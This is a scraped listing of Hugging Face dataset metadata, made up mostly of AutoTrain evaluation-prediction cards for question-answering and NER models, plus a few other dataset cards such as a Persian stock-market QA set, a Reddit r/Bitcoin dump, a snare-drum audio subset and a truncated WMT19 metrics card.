Thanks to [@sjrlee](https://huggingface.co/sjrlee) for evaluating this model. | autoevaluate/autoeval-staging-eval-project-squad_v2-fdec2e9c-11705559 | [
"autotrain",
"evaluation",
"region:us"
] | 2022-07-25T06:24:04+00:00 | {"type": "predictions", "tags": ["autotrain", "evaluation"], "datasets": ["squad_v2"], "eval_info": {"task": "extractive_question_answering", "model": "deepset/xlm-roberta-large-squad2", "metrics": [], "dataset_name": "squad_v2", "dataset_config": "squad_v2", "dataset_split": "validation", "col_mapping": {"context": "context", "question": "question", "answers-text": "answers.text", "answers-answer_start": "answers.answer_start"}}} | 2022-07-25T06:29:26+00:00 |
a6036b2dcc7768e2940fcab790fd0a42fa5a387d | # Dataset Card for AutoTrain Evaluator
This repository contains model predictions generated by [AutoTrain](https://huggingface.co/autotrain) for the following task and dataset:
* Task: Question Answering
* Model: deepset/roberta-large-squad2
* Dataset: squad_v2
* Config: squad_v2
* Split: validation
To run new evaluation jobs, visit Hugging Face's [automatic model evaluator](https://huggingface.co/spaces/autoevaluate/model-evaluator).
## Contributions
Thanks to [@sjrlee](https://huggingface.co/sjrlee) for evaluating this model. | autoevaluate/autoeval-staging-eval-project-squad_v2-8b8e12f7-11715560 | [
"autotrain",
"evaluation",
"region:us"
] | 2022-07-25T06:28:43+00:00 | {"type": "predictions", "tags": ["autotrain", "evaluation"], "datasets": ["squad_v2"], "eval_info": {"task": "extractive_question_answering", "model": "deepset/roberta-large-squad2", "metrics": ["squad_v2"], "dataset_name": "squad_v2", "dataset_config": "squad_v2", "dataset_split": "validation", "col_mapping": {"context": "context", "question": "question", "answers-text": "answers.text", "answers-answer_start": "answers.answer_start"}}} | 2022-07-25T06:33:16+00:00 |
eee0a8ef4396cb4882284ec2fda1d0ccfd8d5550 | # Dataset Card for AutoTrain Evaluator
This repository contains model predictions generated by [AutoTrain](https://huggingface.co/autotrain) for the following task and dataset:
* Task: Question Answering
* Model: Shanny/bert-finetuned-squad
* Dataset: squad
* Config: plain_text
* Split: validation
To run new evaluation jobs, visit Hugging Face's [automatic model evaluator](https://huggingface.co/spaces/autoevaluate/model-evaluator).
## Contributions
Thanks to [@ola13](https://huggingface.co/ola13) for evaluating this model. | autoevaluate/autoeval-staging-eval-project-squad-810261fd-11725561 | [
"autotrain",
"evaluation",
"region:us"
] | 2022-07-25T08:33:54+00:00 | {"type": "predictions", "tags": ["autotrain", "evaluation"], "datasets": ["squad"], "eval_info": {"task": "extractive_question_answering", "model": "Shanny/bert-finetuned-squad", "metrics": ["accuracy"], "dataset_name": "squad", "dataset_config": "plain_text", "dataset_split": "validation", "col_mapping": {"context": "context", "question": "question", "answers-text": "answers.text", "answers-answer_start": "answers.answer_start"}}} | 2022-07-25T08:36:36+00:00 |
9dfd7de60214c80b44de6a81dda0902c12675511 | naem1023/augmented-namuwiki | [
"license:apache-2.0",
"region:us"
] | 2022-07-25T10:02:14+00:00 | {"license": "apache-2.0"} | 2022-07-25T11:45:56+00:00 |
|
0364e2cff990bd0fc2e78d963f2d263e9e645a91 | naem1023/augmented-kowiki | [
"license:apache-2.0",
"region:us"
] | 2022-07-25T10:12:25+00:00 | {"license": "apache-2.0"} | 2022-07-25T12:10:57+00:00 |
|
1439a395520ae8c2068bad1e1b07b8d5f052b9be | # Dataset Card for AutoTrain Evaluator
This repository contains model predictions generated by [AutoTrain](https://huggingface.co/autotrain) for the following task and dataset:
* Task: Question Answering
* Model: deepset/deberta-v3-base-squad2
* Dataset: squad_v2
* Config: squad_v2
* Split: validation
To run new evaluation jobs, visit Hugging Face's [automatic model evaluator](https://huggingface.co/spaces/autoevaluate/model-evaluator).
## Contributions
Thanks to [@sjrlee](https://huggingface.co/sjrlee) for evaluating this model. | autoevaluate/autoeval-staging-eval-project-squad_v2-ebf1ec50-11735562 | [
"autotrain",
"evaluation",
"region:us"
] | 2022-07-25T10:33:05+00:00 | {"type": "predictions", "tags": ["autotrain", "evaluation"], "datasets": ["squad_v2"], "eval_info": {"task": "extractive_question_answering", "model": "deepset/deberta-v3-base-squad2", "metrics": [], "dataset_name": "squad_v2", "dataset_config": "squad_v2", "dataset_split": "validation", "col_mapping": {"context": "context", "question": "question", "answers-text": "answers.text", "answers-answer_start": "answers.answer_start"}}} | 2022-07-25T10:37:39+00:00 |
09d0cf6b8b8cf1c47c25270219270ee5b2207921 | # Dataset Card for AutoTrain Evaluator
This repository contains model predictions generated by [AutoTrain](https://huggingface.co/autotrain) for the following task and dataset:
* Task: Question Answering
* Model: deepset/tinyroberta-squad2
* Dataset: squad_v2
* Config: squad_v2
* Split: validation
To run new evaluation jobs, visit Hugging Face's [automatic model evaluator](https://huggingface.co/spaces/autoevaluate/model-evaluator).
## Contributions
Thanks to [@sjrlee](https://huggingface.co/sjrlee) for evaluating this model. | autoevaluate/autoeval-staging-eval-project-squad_v2-e85023ec-11745564 | [
"autotrain",
"evaluation",
"region:us"
] | 2022-07-25T10:37:45+00:00 | {"type": "predictions", "tags": ["autotrain", "evaluation"], "datasets": ["squad_v2"], "eval_info": {"task": "extractive_question_answering", "model": "deepset/tinyroberta-squad2", "metrics": [], "dataset_name": "squad_v2", "dataset_config": "squad_v2", "dataset_split": "validation", "col_mapping": {"context": "context", "question": "question", "answers-text": "answers.text", "answers-answer_start": "answers.answer_start"}}} | 2022-07-25T10:40:25+00:00 |
55b56822e4f31bfb149e822c0004ad25ad90fb94 | # Dataset Card for AutoTrain Evaluator
This repository contains model predictions generated by [AutoTrain](https://huggingface.co/autotrain) for the following task and dataset:
* Task: Question Answering
* Model: deepset/roberta-large-squad2
* Dataset: squad_v2
* Config: squad_v2
* Split: validation
To run new evaluation jobs, visit Hugging Face's [automatic model evaluator](https://huggingface.co/spaces/autoevaluate/model-evaluator).
## Contributions
Thanks to [@sjrlee](https://huggingface.co/sjrlee) for evaluating this model. | autoevaluate/autoeval-staging-eval-project-squad_v2-e85023ec-11745565 | [
"autotrain",
"evaluation",
"region:us"
] | 2022-07-25T10:37:49+00:00 | {"type": "predictions", "tags": ["autotrain", "evaluation"], "datasets": ["squad_v2"], "eval_info": {"task": "extractive_question_answering", "model": "deepset/roberta-large-squad2", "metrics": [], "dataset_name": "squad_v2", "dataset_config": "squad_v2", "dataset_split": "validation", "col_mapping": {"context": "context", "question": "question", "answers-text": "answers.text", "answers-answer_start": "answers.answer_start"}}} | 2022-07-25T10:42:15+00:00 |
15a9bdb8362664a48997e28994c2baf46eaa71f2 | # Dataset Card for AutoTrain Evaluator
This repository contains model predictions generated by [AutoTrain](https://huggingface.co/autotrain) for the following task and dataset:
* Task: Question Answering
* Model: deepset/deberta-v3-base-squad2
* Dataset: squad_v2
* Config: squad_v2
* Split: validation
To run new evaluation jobs, visit Hugging Face's [automatic model evaluator](https://huggingface.co/spaces/autoevaluate/model-evaluator).
## Contributions
Thanks to [@sjrlee](https://huggingface.co/sjrlee) for evaluating this model. | autoevaluate/autoeval-staging-eval-project-squad_v2-e85023ec-11745563 | [
"autotrain",
"evaluation",
"region:us"
] | 2022-07-25T10:38:34+00:00 | {"type": "predictions", "tags": ["autotrain", "evaluation"], "datasets": ["squad_v2"], "eval_info": {"task": "extractive_question_answering", "model": "deepset/deberta-v3-base-squad2", "metrics": [], "dataset_name": "squad_v2", "dataset_config": "squad_v2", "dataset_split": "validation", "col_mapping": {"context": "context", "question": "question", "answers-text": "answers.text", "answers-answer_start": "answers.answer_start"}}} | 2022-07-25T10:47:52+00:00 |
87c34d7017c665a0bb76b416bcfb62bfe17a2ae6 | # Dataset Card for AutoTrain Evaluator
This repository contains model predictions generated by [AutoTrain](https://huggingface.co/autotrain) for the following task and dataset:
* Task: Question Answering
* Model: deepset/bert-large-uncased-whole-word-masking-squad2
* Dataset: squad_v2
* Config: squad_v2
* Split: validation
To run new evaluation jobs, visit Hugging Face's [automatic model evaluator](https://huggingface.co/spaces/autoevaluate/model-evaluator).
## Contributions
Thanks to [@sjrlee](https://huggingface.co/sjrlee) for evaluating this model. | autoevaluate/autoeval-staging-eval-project-squad_v2-26568076-11755566 | [
"autotrain",
"evaluation",
"region:us"
] | 2022-07-25T10:49:05+00:00 | {"type": "predictions", "tags": ["autotrain", "evaluation"], "datasets": ["squad_v2"], "eval_info": {"task": "extractive_question_answering", "model": "deepset/bert-large-uncased-whole-word-masking-squad2", "metrics": [], "dataset_name": "squad_v2", "dataset_config": "squad_v2", "dataset_split": "validation", "col_mapping": {"context": "context", "question": "question", "answers-text": "answers.text", "answers-answer_start": "answers.answer_start"}}} | 2022-07-25T10:53:57+00:00 |
de7be88799fc7659e1e51edbcf4a85f37d249e05 | # Dataset Card for AutoTrain Evaluator
This repository contains model predictions generated by [AutoTrain](https://huggingface.co/autotrain) for the following task and dataset:
* Task: Question Answering
* Model: deepset/deberta-v3-large-squad2
* Dataset: squad_v2
* Config: squad_v2
* Split: validation
To run new evaluation jobs, visit Hugging Face's [automatic model evaluator](https://huggingface.co/spaces/autoevaluate/model-evaluator).
## Contributions
Thanks to [@MichelBartels](https://huggingface.co/MichelBartels) for evaluating this model. | autoevaluate/autoeval-staging-eval-project-squad_v2-df3d9ae8-11765567 | [
"autotrain",
"evaluation",
"region:us"
] | 2022-07-25T11:05:23+00:00 | {"type": "predictions", "tags": ["autotrain", "evaluation"], "datasets": ["squad_v2"], "eval_info": {"task": "extractive_question_answering", "model": "deepset/deberta-v3-large-squad2", "metrics": [], "dataset_name": "squad_v2", "dataset_config": "squad_v2", "dataset_split": "validation", "col_mapping": {"context": "context", "question": "question", "answers-text": "answers.text", "answers-answer_start": "answers.answer_start"}}} | 2022-07-25T11:13:39+00:00 |
6d87e9c21e26481e929329cd82ed9d27c1e7da26 | naem1023/augmented-concat-100000 | [
"license:apache-2.0",
"region:us"
] | 2022-07-25T13:04:21+00:00 | {"license": "apache-2.0"} | 2022-07-25T13:30:47+00:00 |
|
9d347362dc8663670ef1512728cdaccf282ef29b | # Dataset Card for AutoTrain Evaluator
This repository contains model predictions generated by [AutoTrain](https://huggingface.co/autotrain) for the following task and dataset:
* Task: Token Classification
* Model: AJGP/bert-finetuned-ner
* Dataset: conll2003
* Config: conll2003
* Split: test
To run new evaluation jobs, visit Hugging Face's [automatic model evaluator](https://huggingface.co/spaces/autoevaluate/model-evaluator).
## Contributions
Thanks to [@hrezaeim](https://huggingface.co/hrezaeim) for evaluating this model. | autoevaluate/autoeval-staging-eval-project-conll2003-2dc2f6d8-11805572 | [
"autotrain",
"evaluation",
"region:us"
] | 2022-07-25T13:25:58+00:00 | {"type": "predictions", "tags": ["autotrain", "evaluation"], "datasets": ["conll2003"], "eval_info": {"task": "entity_extraction", "model": "AJGP/bert-finetuned-ner", "metrics": [], "dataset_name": "conll2003", "dataset_config": "conll2003", "dataset_split": "test", "col_mapping": {"tokens": "tokens", "tags": "ner_tags"}}} | 2022-07-25T13:27:10+00:00 |
249e666291cd556d0c0c7967ee3cb6967d77b56c |
# Dataset Card for [Dataset Name]
## Table of Contents
- [Table of Contents](#table-of-contents)
- [Dataset Description](#dataset-description)
- [Dataset Summary](#dataset-summary)
- [Supported Tasks and Leaderboards](#supported-tasks-and-leaderboards)
- [Languages](#languages)
- [Dataset Structure](#dataset-structure)
- [Data Instances](#data-instances)
- [Data Fields](#data-fields)
- [Data Splits](#data-splits)
- [Dataset Creation](#dataset-creation)
- [Curation Rationale](#curation-rationale)
- [Source Data](#source-data)
- [Annotations](#annotations)
- [Personal and Sensitive Information](#personal-and-sensitive-information)
- [Considerations for Using the Data](#considerations-for-using-the-data)
- [Social Impact of Dataset](#social-impact-of-dataset)
- [Discussion of Biases](#discussion-of-biases)
- [Other Known Limitations](#other-known-limitations)
- [Additional Information](#additional-information)
- [Dataset Curators](#dataset-curators)
- [Licensing Information](#licensing-information)
- [Citation Information](#citation-information)
- [Contributions](#contributions)
## Dataset Description
- **Homepage:**
- **Repository:**
- **Paper:**
- **Leaderboard:**
- **Point of Contact:**
### Dataset Summary
[More Information Needed]
### Supported Tasks and Leaderboards
This dataset is to be served as a reference for QA tasks.
### Languages
Persian
## Dataset Structure
### Data Instances
[More Information Needed]
### Data Fields
[More Information Needed]
### Data Splits
[More Information Needed]
## Dataset Creation
### Curation Rationale
All annotations are done according to the SQuAD2.0 data format.
### Source Data
#### Initial Data Collection and Normalization
All context and some of questions are retrieved from [Faradars Introductory Course to Stock Market](https://blog.faradars.org/%d8%a2%d9%85%d9%88%d8%b2%d8%b4-%d8%a8%d9%88%d8%b1%d8%b3-%d8%b1%d8%a7%db%8c%da%af%d8%a7%d9%86/).
#### Who are the source language producers?
Persian (farsi)
### Annotations
#### Annotation process
All annotations are done via Deepset Haystack annotation tool.
#### Who are the annotators?
Hesam Damghanian (this HF account)
## Considerations for Using the Data
### Social Impact of Dataset
[More Information Needed]
### Discussion of Biases
[More Information Needed]
### Other Known Limitations
[More Information Needed]
## Additional Information
### Dataset Curators
[More Information Needed]
### Licensing Information
[More Information Needed]
### Citation Information
[More Information Needed]
| hdamghanian/Stock-QA-fa | [
"license:mit",
"region:us"
] | 2022-07-25T14:06:08+00:00 | {"license": "mit"} | 2022-07-25T14:16:43+00:00 |
e56574b7a9a0bb7c86f71d6350a3a3a5e68646b1 | cakiki/ASE_runs | [
"license:apache-2.0",
"region:us"
] | 2022-07-25T17:09:35+00:00 | {"license": "apache-2.0"} | 2022-07-25T17:11:20+00:00 |
|
3038d9967602ee1ba85340246bcd49bb52fd3bef |
# Dataset Card for reddit-r-bitcoin-data-for-jun-2022
## Table of Contents
- [Dataset Description](#dataset-description)
- [Dataset Summary](#dataset-summary)
- [Supported Tasks and Leaderboards](#supported-tasks-and-leaderboards)
- [Languages](#languages)
- [Dataset Structure](#dataset-structure)
- [Data Instances](#data-instances)
- [Data Fields](#data-fields)
- [Data Splits](#data-splits)
- [Dataset Creation](#dataset-creation)
- [Curation Rationale](#curation-rationale)
- [Source Data](#source-data)
- [Annotations](#annotations)
- [Personal and Sensitive Information](#personal-and-sensitive-information)
- [Considerations for Using the Data](#considerations-for-using-the-data)
- [Social Impact of Dataset](#social-impact-of-dataset)
- [Discussion of Biases](#discussion-of-biases)
- [Other Known Limitations](#other-known-limitations)
- [Additional Information](#additional-information)
- [Licensing Information](#licensing-information)
## Dataset Description
- **Homepage:** [https://socialgrep.com/datasets](https://socialgrep.com/datasets/reddit-r-bitcoin-data-for-jun-2022?utm_source=huggingface&utm_medium=link&utm_campaign=redditrbitcoindataforjun2022)
- **Reddit downloader used:** [https://socialgrep.com/exports](https://socialgrep.com/exports?utm_source=huggingface&utm_medium=link&utm_campaign=redditrbitcoindataforjun2022)
- **Point of Contact:** [Website](https://socialgrep.com/contact?utm_source=huggingface&utm_medium=link&utm_campaign=redditrbitcoindataforjun2022)
### Dataset Summary
Lite version of our premium [Reddit /r/Bitcoin dataset](https://socialgrep.com/datasets/the-reddit-r-bitcoin-dataset?utm_source=huggingface&utm_medium=link&utm_campaign=redditrbitcoindataforjun2022) - CSV of all posts & comments to the /r/Bitcoin subreddit over Jun 2022.
### Languages
Mainly English.
## Dataset Structure
### Data Instances
A data point is a post or a comment. Due to the separate nature of the two, those exist in two different files - even though many fields are shared.
### Data Fields
- 'type': the type of the data point. Can be 'post' or 'comment'.
- 'id': the base-36 Reddit ID of the data point. Unique when combined with type.
- 'subreddit.id': the base-36 Reddit ID of the data point's host subreddit. Unique.
- 'subreddit.name': the human-readable name of the data point's host subreddit.
- 'subreddit.nsfw': a boolean marking the data point's host subreddit as NSFW or not.
- 'created_utc': a UTC timestamp for the data point.
- 'permalink': a reference link to the data point on Reddit.
- 'score': score of the data point on Reddit.
- 'domain': (Post only) the domain of the data point's link.
- 'url': (Post only) the destination of the data point's link, if any.
- 'selftext': (Post only) the self-text of the data point, if any.
- 'title': (Post only) the title of the post data point.
- 'body': (Comment only) the body of the comment data point.
- 'sentiment': (Comment only) the result of an in-house sentiment analysis pipeline. Used for exploratory analysis.
## Additional Information
### Licensing Information
CC-BY v4.0
| SocialGrep/reddit-r-bitcoin-data-for-jun-2022 | [
"annotations_creators:lexyr",
"language_creators:crowdsourced",
"multilinguality:monolingual",
"size_categories:100K<n<1M",
"source_datasets:original",
"language:en",
"license:cc-by-4.0",
"region:us"
] | 2022-07-25T17:11:58+00:00 | {"annotations_creators": ["lexyr"], "language_creators": ["crowdsourced"], "language": ["en"], "license": ["cc-by-4.0"], "multilinguality": ["monolingual"], "size_categories": ["100K<n<1M"], "source_datasets": ["original"]} | 2022-07-25T17:22:16+00:00 |
24f194c5b6ef29eb784ea3508a022ba848beeea4 |
Kbd latin script: 835k lines from a scraped pile
ru: 3M lines from Wiki (OPUS) | anzorq/kbd_lat-835k_ru-3M | [
"license:unknown",
"region:us"
] | 2022-07-25T17:37:51+00:00 | {"license": "unknown"} | 2022-07-25T22:26:41+00:00 |
71d820d52a2662dd708036a15374bbbd68ff57b9 | # Dataset Card for AutoTrain Evaluator
This repository contains model predictions generated by [AutoTrain](https://huggingface.co/autotrain) for the following task and dataset:
* Task: Question Answering
* Model: deepset/deberta-v3-large-squad2
* Dataset: adversarial_qa
* Config: adversarialQA
* Split: validation
To run new evaluation jobs, visit Hugging Face's [automatic model evaluator](https://huggingface.co/spaces/autoevaluate/model-evaluator).
## Contributions
Thanks to [@mbartolo](https://huggingface.co/mbartolo) for evaluating this model. | autoevaluate/autoeval-staging-eval-project-adversarial_qa-58460439-11825575 | [
"autotrain",
"evaluation",
"region:us"
] | 2022-07-25T21:30:32+00:00 | {"type": "predictions", "tags": ["autotrain", "evaluation"], "datasets": ["adversarial_qa"], "eval_info": {"task": "extractive_question_answering", "model": "deepset/deberta-v3-large-squad2", "metrics": [], "dataset_name": "adversarial_qa", "dataset_config": "adversarialQA", "dataset_split": "validation", "col_mapping": {"context": "context", "question": "question", "answers-text": "answers.text", "answers-answer_start": "answers.answer_start"}}} | 2022-07-25T21:33:19+00:00 |
e53695a23047a407d2999206a03fc82701148a78 | # Dataset Card for AutoTrain Evaluator
This repository contains model predictions generated by [AutoTrain](https://huggingface.co/autotrain) for the following task and dataset:
* Task: Question Answering
* Model: deepset/bert-large-uncased-whole-word-masking-squad2
* Dataset: adversarial_qa
* Config: adversarialQA
* Split: validation
To run new evaluation jobs, visit Hugging Face's [automatic model evaluator](https://huggingface.co/spaces/autoevaluate/model-evaluator).
## Contributions
Thanks to [@mbartolo](https://huggingface.co/mbartolo) for evaluating this model. | autoevaluate/autoeval-staging-eval-project-adversarial_qa-58460439-11825576 | [
"autotrain",
"evaluation",
"region:us"
] | 2022-07-25T21:30:35+00:00 | {"type": "predictions", "tags": ["autotrain", "evaluation"], "datasets": ["adversarial_qa"], "eval_info": {"task": "extractive_question_answering", "model": "deepset/bert-large-uncased-whole-word-masking-squad2", "metrics": [], "dataset_name": "adversarial_qa", "dataset_config": "adversarialQA", "dataset_split": "validation", "col_mapping": {"context": "context", "question": "question", "answers-text": "answers.text", "answers-answer_start": "answers.answer_start"}}} | 2022-07-25T21:32:36+00:00 |
2803c28d2003a2afff2a01b409ff7cd42fb0fb17 | # Dataset Card for AutoTrain Evaluator
This repository contains model predictions generated by [AutoTrain](https://huggingface.co/autotrain) for the following task and dataset:
* Task: Question Answering
* Model: mbartolo/electra-large-synqa
* Dataset: adversarial_qa
* Config: adversarialQA
* Split: validation
To run new evaluation jobs, visit Hugging Face's [automatic model evaluator](https://huggingface.co/spaces/autoevaluate/model-evaluator).
## Contributions
Thanks to [@mbartolo](https://huggingface.co/mbartolo) for evaluating this model. | autoevaluate/autoeval-staging-eval-project-adversarial_qa-58460439-11825574 | [
"autotrain",
"evaluation",
"region:us"
] | 2022-07-25T21:32:16+00:00 | {"type": "predictions", "tags": ["autotrain", "evaluation"], "datasets": ["adversarial_qa"], "eval_info": {"task": "extractive_question_answering", "model": "mbartolo/electra-large-synqa", "metrics": [], "dataset_name": "adversarial_qa", "dataset_config": "adversarialQA", "dataset_split": "validation", "col_mapping": {"context": "context", "question": "question", "answers-text": "answers.text", "answers-answer_start": "answers.answer_start"}}} | 2022-07-25T21:39:49+00:00 |
4deeac719a3ff3df9b5866646f38a35bc45e3c0b | # Dataset Card for AutoTrain Evaluator
This repository contains model predictions generated by [AutoTrain](https://huggingface.co/autotrain) for the following task and dataset:
* Task: Question Answering
* Model: mbartolo/roberta-large-synqa
* Dataset: squad
* Config: plain_text
* Split: validation
To run new evaluation jobs, visit Hugging Face's [automatic model evaluator](https://huggingface.co/spaces/autoevaluate/model-evaluator).
## Contributions
Thanks to [@mbartolo ](https://huggingface.co/mbartolo ) for evaluating this model. | autoevaluate/autoeval-staging-eval-project-squad-95d5e1fd-11835577 | [
"autotrain",
"evaluation",
"region:us"
] | 2022-07-25T21:34:47+00:00 | {"type": "predictions", "tags": ["autotrain", "evaluation"], "datasets": ["squad"], "eval_info": {"task": "extractive_question_answering", "model": "mbartolo/roberta-large-synqa", "metrics": [], "dataset_name": "squad", "dataset_config": "plain_text", "dataset_split": "validation", "col_mapping": {"context": "context", "question": "question", "answers-text": "answers.text", "answers-answer_start": "answers.answer_start"}}} | 2022-07-25T21:38:58+00:00 |
34c8374562d8b0e8846c1b926bbe84f4aef4dca5 | # Dataset Card for AutoTrain Evaluator
This repository contains model predictions generated by [AutoTrain](https://huggingface.co/autotrain) for the following task and dataset:
* Task: Question Answering
* Model: mbartolo/electra-large-synqa
* Dataset: squad
* Config: plain_text
* Split: validation
To run new evaluation jobs, visit Hugging Face's [automatic model evaluator](https://huggingface.co/spaces/autoevaluate/model-evaluator).
## Contributions
Thanks to [@mbartolo ](https://huggingface.co/mbartolo ) for evaluating this model. | autoevaluate/autoeval-staging-eval-project-squad-95d5e1fd-11835578 | [
"autotrain",
"evaluation",
"region:us"
] | 2022-07-25T21:34:52+00:00 | {"type": "predictions", "tags": ["autotrain", "evaluation"], "datasets": ["squad"], "eval_info": {"task": "extractive_question_answering", "model": "mbartolo/electra-large-synqa", "metrics": [], "dataset_name": "squad", "dataset_config": "plain_text", "dataset_split": "validation", "col_mapping": {"context": "context", "question": "question", "answers-text": "answers.text", "answers-answer_start": "answers.answer_start"}}} | 2022-07-25T21:39:01+00:00 |
f329c4e36fa98c42ab3d616e01018048364d47e2 | # Dataset Card for AutoTrain Evaluator
This repository contains model predictions generated by [AutoTrain](https://huggingface.co/autotrain) for the following task and dataset:
* Task: Question Answering
* Model: deepset/roberta-large-squad2
* Dataset: squad
* Config: plain_text
* Split: validation
To run new evaluation jobs, visit Hugging Face's [automatic model evaluator](https://huggingface.co/spaces/autoevaluate/model-evaluator).
## Contributions
Thanks to [@mbartolo ](https://huggingface.co/mbartolo ) for evaluating this model. | autoevaluate/autoeval-staging-eval-project-squad-95d5e1fd-11835579 | [
"autotrain",
"evaluation",
"region:us"
] | 2022-07-25T21:34:58+00:00 | {"type": "predictions", "tags": ["autotrain", "evaluation"], "datasets": ["squad"], "eval_info": {"task": "extractive_question_answering", "model": "deepset/roberta-large-squad2", "metrics": [], "dataset_name": "squad", "dataset_config": "plain_text", "dataset_split": "validation", "col_mapping": {"context": "context", "question": "question", "answers-text": "answers.text", "answers-answer_start": "answers.answer_start"}}} | 2022-07-25T21:39:01+00:00 |
29dd17d42866336178ac700cbb45bce287a38a34 | # Dataset Card for AutoTrain Evaluator
This repository contains model predictions generated by [AutoTrain](https://huggingface.co/autotrain) for the following task and dataset:
* Task: Question Answering
* Model: deepset/deberta-v3-base-squad2
* Dataset: squad
* Config: plain_text
* Split: validation
To run new evaluation jobs, visit Hugging Face's [automatic model evaluator](https://huggingface.co/spaces/autoevaluate/model-evaluator).
## Contributions
Thanks to [@mbartolo ](https://huggingface.co/mbartolo ) for evaluating this model. | autoevaluate/autoeval-staging-eval-project-squad-95d5e1fd-11835580 | [
"autotrain",
"evaluation",
"region:us"
] | 2022-07-25T21:35:07+00:00 | {"type": "predictions", "tags": ["autotrain", "evaluation"], "datasets": ["squad"], "eval_info": {"task": "extractive_question_answering", "model": "deepset/deberta-v3-base-squad2", "metrics": [], "dataset_name": "squad", "dataset_config": "plain_text", "dataset_split": "validation", "col_mapping": {"context": "context", "question": "question", "answers-text": "answers.text", "answers-answer_start": "answers.answer_start"}}} | 2022-07-25T21:39:44+00:00 |
cdfeb9020eb204c2b5b4e28ac3ef7b18a658cb76 | # Dataset Card for AutoTrain Evaluator
This repository contains model predictions generated by [AutoTrain](https://huggingface.co/autotrain) for the following task and dataset:
* Task: Question Answering
* Model: mbartolo/roberta-large-synqa-ext
* Dataset: adversarial_qa
* Config: adversarialQA
* Split: validation
To run new evaluation jobs, visit Hugging Face's [automatic model evaluator](https://huggingface.co/spaces/autoevaluate/model-evaluator).
## Contributions
Thanks to [@mbartolo](https://huggingface.co/mbartolo) for evaluating this model. | autoevaluate/autoeval-staging-eval-project-adversarial_qa-8ac5f360-11845582 | [
"autotrain",
"evaluation",
"region:us"
] | 2022-07-25T22:18:54+00:00 | {"type": "predictions", "tags": ["autotrain", "evaluation"], "datasets": ["adversarial_qa"], "eval_info": {"task": "extractive_question_answering", "model": "mbartolo/roberta-large-synqa-ext", "metrics": [], "dataset_name": "adversarial_qa", "dataset_config": "adversarialQA", "dataset_split": "validation", "col_mapping": {"context": "context", "question": "question", "answers-text": "answers.text", "answers-answer_start": "answers.answer_start"}}} | 2022-07-25T22:20:32+00:00 |
8082af326609adb4497e5770cb5c05824349d0ef | # Dataset Card for AutoTrain Evaluator
This repository contains model predictions generated by [AutoTrain](https://huggingface.co/autotrain) for the following task and dataset:
* Task: Question Answering
* Model: mbartolo/roberta-large-synqa
* Dataset: adversarial_qa
* Config: adversarialQA
* Split: validation
To run new evaluation jobs, visit Hugging Face's [automatic model evaluator](https://huggingface.co/spaces/autoevaluate/model-evaluator).
## Contributions
Thanks to [@mbartolo](https://huggingface.co/mbartolo) for evaluating this model. | autoevaluate/autoeval-staging-eval-project-adversarial_qa-8ac5f360-11845581 | [
"autotrain",
"evaluation",
"region:us"
] | 2022-07-25T22:20:02+00:00 | {"type": "predictions", "tags": ["autotrain", "evaluation"], "datasets": ["adversarial_qa"], "eval_info": {"task": "extractive_question_answering", "model": "mbartolo/roberta-large-synqa", "metrics": [], "dataset_name": "adversarial_qa", "dataset_config": "adversarialQA", "dataset_split": "validation", "col_mapping": {"context": "context", "question": "question", "answers-text": "answers.text", "answers-answer_start": "answers.answer_start"}}} | 2022-07-25T22:26:00+00:00 |
dc842ba21530077e2385514585f385e671eb9f32 |
# Snares
FSD50K subset of just snares.
```
wget -nc https://huggingface.co/datasets/nateraw/snares/resolve/main/snares.csv
wget -nc https://huggingface.co/datasets/nateraw/snares/resolve/main/snares.zip
unzip snares.zip
```
If you unpack as described above, `snares.csv` will have correct filepath to audio file when loaded in as CSV. Here we show with pandas...
```python
import pandas as pd
df = pd.read_csv('snares.csv')
``` | nateraw/snares | [
"language:en",
"license:other",
"region:us"
] | 2022-07-26T00:38:47+00:00 | {"language": "en", "license": "other"} | 2022-07-26T00:48:47+00:00 |
e35dab202174c0845fc172f35bfcada0a31bafa4 | betterme/goldendata | [
"license:mit",
"region:us"
] | 2022-07-26T00:58:58+00:00 | {"license": "mit"} | 2022-07-26T01:05:07+00:00 |
|
cdeb4ea38252c283f5717b007ae8f8d5c5d3c73f | annotations_creators:
- no-annotation
language:
- en
- fa
language_creators:
- crowdsourced
license:
- other
multilinguality:
- multilingual
pretty_name: en-fa-translation
size_categories:
- 1M<n<10M
source_datasets:
- original
tags: []
task_categories:
- translation
task_ids: [] | Kamrani/en-fa-translation | [
"region:us"
] | 2022-07-26T02:10:34+00:00 | {} | 2022-07-30T03:13:38+00:00 |
e16e967d01e8a5e796eef1ec263c83b2c3f3fac3 |
The prompts used in the Simulacra discord bot and [released](https://github.com/JD-P/simulacra-aesthetic-captions)
Thanks to deltawave on discord for supplying this dataset! | BirdL/SimulaPrompts | [
"license:cc0-1.0",
"region:us"
] | 2022-07-26T03:52:06+00:00 | {"license": "cc0-1.0"} | 2022-12-19T22:06:33+00:00 |
8078e27c5ff4c52d5b85572ed45d36c712a3c423 |
# Dataset Card for WMT19 Metrics Task
## Table of Contents
- [Table of Contents](#table-of-contents)
- [Dataset Description](#dataset-description)
- [Dataset Summary](#dataset-summary)
- [Supported Tasks and Leaderboards](#supported-tasks-and-leaderboards)
- [Languages](#languages)
- [Dataset Structure](#dataset-structure)
- [Data Instances](#data-instances)
- [Data Fields](#data-fields)
- [Data Splits](#data-splits)
- [Dataset Creation](#dataset-creation)
- [Curation Rationale](#curation-rationale)
- [Source Data](#source-data)
- [Annotations](#annotations)
- [Personal and Sensitive Information](#personal-and-sensitive-information)
- [Considerations for Using the Data](#considerations-for-using-the-data)
- [Social Impact of Dataset](#social-impact-of-dataset)
- [Discussion of Biases](#discussion-of-biases)
- [Other Known Limitations](#other-known-limitations)
- [Additional Information](#additional-information)
- [Dataset Curators](#dataset-curators)
- [Licensing Information](#licensing-information)
- [Citation Information](#citation-information)
- [Contributions](#contributions)
## Dataset Description
- **Homepage:** [WMT19 Metrics Shared Task](https://www.statmt.org/wmt19/metrics-task.html)
- **Repository:** [MT Metrics Eval Github Repository](https://github.com/google-research/mt-metrics-eval)
- **Paper:** [Paper](https://aclanthology.org/W19-5302/)
### Dataset Summary
[More Information Needed]
### Supported Tasks and Leaderboards
[More Information Needed]
### Languages
The dataset comprises the following language pairs:
- de-cs
- de-en
- de-fr
- en-cs
- en-de
- en-fi
- en-gu
- en-kk
- en-lt
- en-ru
- en-zh
- fi-en
- fr-de
- gu-en
- kk-en
- lt-en
- ru-en
- zh-en
## Dataset Structure
### Data Instances
[More Information Needed]
### Data Fields
[More Information Needed]
### Data Splits
[More Information Needed]
## Dataset Creation
### Curation Rationale
[More Information Needed]
### Source Data
#### Initial Data Collection and Normalization
[More Information Needed]
